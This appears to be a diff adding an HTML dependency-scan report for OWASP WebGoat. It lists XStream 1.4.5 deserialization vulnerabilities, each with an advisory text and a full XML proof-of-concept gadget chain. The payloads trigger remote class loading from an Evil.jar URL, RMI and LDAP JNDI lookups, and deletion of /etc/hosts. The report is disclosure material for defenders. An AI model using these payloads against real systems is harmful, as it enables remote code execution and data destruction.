+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;sun.awt.datatransfer.DataTransferer$IndexOrderComparator&#39;&gt;
+        &lt;indexMap class=&#39;com.sun.xml.internal.ws.client.ResponseContext&#39;&gt;
+          &lt;packet&gt;
+            &lt;message class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart&#39;&gt;
+              &lt;dataSource class=&#39;com.sun.xml.internal.ws.message.JAXBAttachment&#39;&gt;
+                &lt;bridge class=&#39;com.sun.xml.internal.ws.db.glassfish.BridgeWrapper&#39;&gt;
+                  &lt;bridge class=&#39;com.sun.xml.internal.bind.v2.runtime.BridgeImpl&#39;&gt;
+                    &lt;bi class=&#39;com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl&#39;&gt;
+                      &lt;jaxbType&gt;com.sun.rowset.JdbcRowSetImpl&lt;/jaxbType&gt;
+                      &lt;uriProperties/&gt;
+                      &lt;attributeProperties/&gt;
+                      &lt;inheritedAttWildcard class=&#39;com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection&#39;&gt;
+                        &lt;getter&gt;
+                          &lt;class&gt;com.sun.rowset.JdbcRowSetImpl&lt;/class&gt;
+                          &lt;name&gt;getDatabaseMetaData&lt;/name&gt;
+                          &lt;parameter-types/&gt;
+                        &lt;/getter&gt;
+                      &lt;/inheritedAttWildcard&gt;
+                    &lt;/bi&gt;
+                    &lt;tagName/&gt;
+                    &lt;context&gt;
+                      &lt;marshallerPool class=&#39;com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1&#39;&gt;
+                        &lt;outer-class reference=&#39;../..&#39;/&gt;
+                      &lt;/marshallerPool&gt;
+                      &lt;nameList&gt;
+                        &lt;nsUriCannotBeDefaulted&gt;
+                          &lt;boolean&gt;true&lt;/boolean&gt;
+                        &lt;/nsUriCannotBeDefaulted&gt;
+                        &lt;namespaceURIs&gt;
+                          &lt;string&gt;1&lt;/string&gt;
+                        &lt;/namespaceURIs&gt;
+                        &lt;localNames&gt;
+                          &lt;string&gt;UTF-8&lt;/string&gt;
+                        &lt;/localNames&gt;
+                      &lt;/nameList&gt;
+                    &lt;/context&gt;
+                  &lt;/bridge&gt;
+                &lt;/bridge&gt;
+                &lt;jaxbObject class=&#39;com.sun.rowset.JdbcRowSetImpl&#39; serialization=&#39;custom&#39;&gt;
+                  &lt;javax.sql.rowset.BaseRowSet&gt;
+                    &lt;default&gt;
+                      &lt;concurrency&gt;1008&lt;/concurrency&gt;
+                      &lt;escapeProcessing&gt;true&lt;/escapeProcessing&gt;
+                      &lt;fetchDir&gt;1000&lt;/fetchDir&gt;
+                      &lt;fetchSize&gt;0&lt;/fetchSize&gt;
+                      &lt;isolation&gt;2&lt;/isolation&gt;
+                      &lt;maxFieldSize&gt;0&lt;/maxFieldSize&gt;
+                      &lt;maxRows&gt;0&lt;/maxRows&gt;
+                      &lt;queryTimeout&gt;0&lt;/queryTimeout&gt;
+                      &lt;readOnly&gt;true&lt;/readOnly&gt;
+                      &lt;rowSetType&gt;1004&lt;/rowSetType&gt;
+                      &lt;showDeleted&gt;false&lt;/showDeleted&gt;
+                      &lt;dataSource&gt;rmi://localhost:15000/CallRemoteMethod&lt;/dataSource&gt;
+                      &lt;params/&gt;
+                    &lt;/default&gt;
+                  &lt;/javax.sql.rowset.BaseRowSet&gt;
+                  &lt;com.sun.rowset.JdbcRowSetImpl&gt;
+                    &lt;default&gt;
+                      &lt;iMatchColumns&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                        &lt;int&gt;-1&lt;/int&gt;
+                      &lt;/iMatchColumns&gt;
+                      &lt;strMatchColumns&gt;
+                        &lt;string&gt;foo&lt;/string&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                        &lt;null/&gt;
+                      &lt;/strMatchColumns&gt;
+                    &lt;/default&gt;
+                  &lt;/com.sun.rowset.JdbcRowSetImpl&gt;
+                &lt;/jaxbObject&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+            &lt;satellites/&gt;
+            &lt;invocationProperties/&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow [the recommendation](https://x-stream.github.io/sec</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">337</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XRTreeFrag&#39;&gt;
+      &lt;m__DTMXRTreeFrag&gt;
+        &lt;m__dtm class=&#39;com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM&#39;&gt;
+          &lt;m__size&gt;-10086&lt;/m__size&gt;
+          &lt;m__mgrDefault&gt;
+            &lt;__overrideDefaultParser&gt;false&lt;/__overrideDefaultParser&gt;
+            &lt;m__incremental&gt;false&lt;/m__incremental&gt;
+            &lt;m__source__location&gt;false&lt;/m__source__location&gt;
+            &lt;m__dtms&gt;
+              &lt;null/&gt;
+            &lt;/m__dtms&gt;
+            &lt;m__defaultHandler/&gt;
+          &lt;/m__mgrDefault&gt;
+          &lt;m__shouldStripWS&gt;false&lt;/m__shouldStripWS&gt;
+          &lt;m__indexing&gt;false&lt;/m__indexing&gt;
+          &lt;m__incrementalSAXSource class=&#39;com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces&#39;&gt;
+            &lt;fPullParserConfig class=&#39;com.sun.rowset.JdbcRowSetImpl&#39; serialization=&#39;custom&#39;&gt;
+              &lt;javax.sql.rowset.BaseRowSet&gt;
+                &lt;default&gt;
+                  &lt;concurrency&gt;1008&lt;/concurrency&gt;
+                  &lt;escapeProcessing&gt;true&lt;/escapeProcessing&gt;
+                  &lt;fetchDir&gt;1000&lt;/fetchDir&gt;
+                  &lt;fetchSize&gt;0&lt;/fetchSize&gt;
+                  &lt;isolation&gt;2&lt;/isolation&gt;
+                  &lt;maxFieldSize&gt;0&lt;/maxFieldSize&gt;
+                  &lt;maxRows&gt;0&lt;/maxRows&gt;
+                  &lt;queryTimeout&gt;0&lt;/queryTimeout&gt;
+                  &lt;readOnly&gt;true&lt;/readOnly&gt;
+                  &lt;rowSetType&gt;1004&lt;/rowSetType&gt;
+                  &lt;showDeleted&gt;false&lt;/showDeleted&gt;
+                  &lt;dataSource&gt;rmi://localhost:15000/CallRemoteMethod&lt;/dataSource&gt;
+                  &lt;listeners/&gt;
+                  &lt;params/&gt;
+                &lt;/default&gt;
+              &lt;/javax.sql.rowset.BaseRowSet&gt;
+              &lt;com.sun.rowset.JdbcRowSetImpl&gt;
+                &lt;default/&gt;
+              &lt;/com.sun.rowset.JdbcRowSetImpl&gt;
+            &lt;/fPullParserConfig&gt;
+            &lt;fConfigSetInput&gt;
+              &lt;class&gt;com.sun.rowset.JdbcRowSetImpl&lt;/class&gt;
+              &lt;name&gt;setAutoCommit&lt;/name&gt;
+              &lt;parameter-types&gt;
+                &lt;class&gt;boolean&lt;/class&gt;
+              &lt;/parameter-types&gt;
+            &lt;/fConfigSetInput&gt;
+            &lt;fConfigParse reference=&#39;../fConfigSetInput&#39;/&gt;
+            &lt;fParseInProgress&gt;false&lt;/fParseInProgress&gt;
+          &lt;/m__incrementalSAXSource&gt;
+          &lt;m__walker&gt;
+            &lt;nextIsRaw&gt;false&lt;/nextIsRaw&gt;
+          &lt;/m__walker&gt;
+          &lt;m__endDocumentOccured&gt;false&lt;/m__endDocumentOccured&gt;
+          &lt;m__idAttributes/&gt;
+          &lt;m__textPendingStart&gt;-1&lt;/m__textPendingStart&gt;
+          &lt;m__useSourceLocationProperty&gt;false&lt;/m__useSourceLocationProperty&gt;
+          &lt;m__pastFirstElement&gt;false&lt;/m__pastFirstElement&gt;
+        &lt;/m__dtm&gt;
+        &lt;m__dtmIdentity&gt;1&lt;/m__dtmIdentity&gt;
+      &lt;/m__DTMXRTreeFrag&gt;
+      &lt;m__dtmRoot&gt;1&lt;/m__dtmRoot&gt;
+      &lt;m__allowRelease&gt;false&lt;/m__allowRelease&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+      &lt;m__obj class=&#39;string&#39;&gt;test&lt;/m__obj&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+&lt;/sorted-set&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many o</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">162</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332</li>
+      <li class="card-meta-item">CWE-94, CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;javafx.collections.ObservableList$1&#39;/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
+        &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+          &lt;contentType&gt;text/plain&lt;/contentType&gt;
+          &lt;is class=&#39;java.io.SequenceInputStream&#39;&gt;
+            &lt;e class=&#39;javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator&#39;&gt;
+              &lt;iterator class=&#39;com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator&#39;&gt;
+                &lt;names class=&#39;java.util.AbstractList$Itr&#39;&gt;
+                  &lt;cursor&gt;0&lt;/cursor&gt;
+                  &lt;lastRet&gt;-1&lt;/lastRet&gt;
+                  &lt;expectedModCount&gt;0&lt;/expectedModCount&gt;
+                  &lt;outer-class class=&#39;java.util.Arrays$ArrayList&#39;&gt;
+                    &lt;a class=&#39;string-array&#39;&gt;
+                      &lt;string&gt;Evil&lt;/string&gt;
+                    &lt;/a&gt;
+                  &lt;/outer-class&gt;
+                &lt;/names&gt;
+                &lt;processorCL class=&#39;java.net.URLClassLoader&#39;&gt;
+                  &lt;ucp class=&#39;sun.misc.URLClassPath&#39;&gt;
+                    &lt;urls serialization=&#39;custom&#39;&gt;
+                      &lt;unserializable-parents/&gt;
+                      &lt;vector&gt;
+                        &lt;default&gt;
+                          &lt;capacityIncrement&gt;0&lt;/capacityIncrement&gt;
+                          &lt;elementCount&gt;1&lt;/elementCount&gt;
+                          &lt;elementData&gt;
+                            &lt;url&gt;http://127.0.0.1:80/Evil.jar&lt;/url&gt;
+                          &lt;/elementData&gt;
+                        &lt;/default&gt;
+                      &lt;/vector&gt;
+                    &lt;/urls&gt;
+                    &lt;path&gt;
+                      &lt;url&gt;http://127.0.0.1:80/Evil.jar&lt;/url&gt;
+                    &lt;/path&gt;
+                    &lt;loaders/&gt;
+                    &lt;lmap/&gt;
+                  &lt;/ucp&gt;
+                  &lt;package2certs class=&#39;concurrent-hash-map&#39;/&gt;
+                  &lt;classes/&gt;
+                  &lt;defaultDomain&gt;
+                    &lt;classloader class=&#39;java.net.URLClassLoader&#39; reference=&#39;../..&#39;/&gt;
+                    &lt;principals/&gt;
+                    &lt;hasAllPerm&gt;false&lt;/hasAllPerm&gt;
+                    &lt;staticPermissions&gt;false&lt;/staticPermissions&gt;
+                    &lt;key&gt;
+                      &lt;outer-class reference=&#39;../..&#39;/&gt;
+                    &lt;/key&gt;
+                  &lt;/defaultDomain&gt;
+                  &lt;initialized&gt;true&lt;/initialized&gt;
+                  &lt;pdcache/&gt;
+                &lt;/processorCL&gt;
+              &lt;/iterator&gt;
+              &lt;type&gt;KEYS&lt;/type&gt;
+            &lt;/e&gt;
+            &lt;in class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+              &lt;buf&gt;&lt;/buf&gt;
+              &lt;pos&gt;-2147483648&lt;/pos&gt;
+              &lt;mark&gt;0&lt;/mark&gt;
+              &lt;count&gt;0&lt;/count&gt;
+            &lt;/in&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference=&#39;../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">142</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;sun.awt.datatransfer.DataTransferer$IndexOrderComparator&#39;&gt;
+        &lt;indexMap class=&#39;com.sun.xml.internal.ws.client.ResponseContext&#39;&gt;
+          &lt;packet&gt;
+            &lt;message class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart&#39;&gt;
+              &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource&#39;&gt;
+                &lt;part&gt;
+                  &lt;dataHead&gt;
+                    &lt;tail/&gt;
+                    &lt;head&gt;
+                      &lt;data class=&#39;com.sun.xml.internal.org.jvnet.mimepull.MemoryData&#39;&gt;
+                        &lt;len&gt;3&lt;/len&gt;
+                        &lt;data&gt;AQID&lt;/data&gt;
+                      &lt;/data&gt;
+                    &lt;/head&gt;
+                  &lt;/dataHead&gt;
+                  &lt;contentTransferEncoding&gt;base64&lt;/contentTransferEncoding&gt;
+                  &lt;msg&gt;
+                    &lt;it class=&#39;java.util.ArrayList$Itr&#39;&gt;
+                      &lt;cursor&gt;0&lt;/cursor&gt;
+                      &lt;lastRet&gt;1&lt;/lastRet&gt;
+                      &lt;expectedModCount&gt;4&lt;/expectedModCount&gt;
+                        &lt;outer-class&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                        &lt;/outer-class&gt;
+                    &lt;/it&gt;
+                    &lt;in class=&#39;java.io.FileInputStream&#39;&gt;
+                      &lt;fd/&gt;
+                      &lt;channel class=&#39;sun.nio.ch.FileChannelImpl&#39;&gt;
+                        &lt;closeLock/&gt;
+                        &lt;open&gt;true&lt;/open&gt;
+                        &lt;threads&gt;
+                          &lt;used&gt;-1&lt;/used&gt;
+                        &lt;/threads&gt;
+                        &lt;parent class=&#39;sun.plugin2.ipc.unix.DomainSocketNamedPipe&#39;&gt;
+                          &lt;sockClient&gt;
+                            &lt;fileName&gt;/etc/hosts&lt;/fileName&gt;
+                            &lt;unlinkFile&gt;true&lt;/unlinkFile&gt;
+                          &lt;/sockClient&gt;
+                          &lt;connectionSync/&gt;
+                        &lt;/parent&gt;
+                      &lt;/channel&gt;
+                      &lt;closeLock/&gt;
+                    &lt;/in&gt;
+                  &lt;/msg&gt;
+                &lt;/part&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+            &lt;satellites/&gt;
+            &lt;invocationProperties/&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">164</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;sorted-set&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;javax.swing.MultiUIDefaults&#39; serialization=&#39;custom&#39;&gt;
+      &lt;unserializable-parents/&gt;
+      &lt;hashtable&gt;
+        &lt;default&gt;
+          &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+          &lt;threshold&gt;525&lt;/threshold&gt;
+        &lt;/default&gt;
+        &lt;int&gt;700&lt;/int&gt;
+        &lt;int&gt;0&lt;/int&gt;
+      &lt;/hashtable&gt;
+      &lt;javax.swing.UIDefaults&gt;
+        &lt;default&gt;
+          &lt;defaultLocale&gt;zh_CN&lt;/defaultLocale&gt;
+          &lt;resourceCache/&gt;
+        &lt;/default&gt;
+      &lt;/javax.swing.UIDefaults&gt;
+      &lt;javax.swing.MultiUIDefaults&gt;
+        &lt;default&gt;
+          &lt;tables&gt;
+            &lt;javax.swing.UIDefaults serialization=&#39;custom&#39;&gt;
+              &lt;unserializable-parents/&gt;
+              &lt;hashtable&gt;
+                &lt;default&gt;
+                  &lt;loadFactor&gt;0.75&lt;/loadFactor&gt;
+                  &lt;threshold&gt;525&lt;/threshold&gt;
+                &lt;/default&gt;
+                &lt;int&gt;700&lt;/int&gt;
+                &lt;int&gt;1&lt;/int&gt;
+                &lt;sun.swing.SwingLazyValue&gt;
+                  &lt;className&gt;javax.naming.InitialContext&lt;/className&gt;
+                  &lt;methodName&gt;doLookup&lt;/methodName&gt;
+                  &lt;args&gt;
+                    &lt;arg&gt;ldap://localhost:1099/CallRemoteMethod&lt;/arg&gt;
+                  &lt;/args&gt;
+                &lt;/sun.swing.SwingLazyValue&gt;
+              &lt;/hashtable&gt;
+              &lt;javax.swing.UIDefaults&gt;
+                &lt;default&gt;
+                  &lt;defaultLocale reference=&#39;../../../../../../../javax.swing.UIDefaults/default/defaultLocale&#39;/&gt;
+                  &lt;resourceCache/&gt;
+                &lt;/default&gt;
+              &lt;/javax.swing.UIDefaults&gt;
+            &lt;/javax.swing.UIDefaults&gt;
+          &lt;/tables&gt;
+        &lt;/default&gt;
+      &lt;/javax.swing.MultiUIDefaults&gt;
+    &lt;/value&gt;
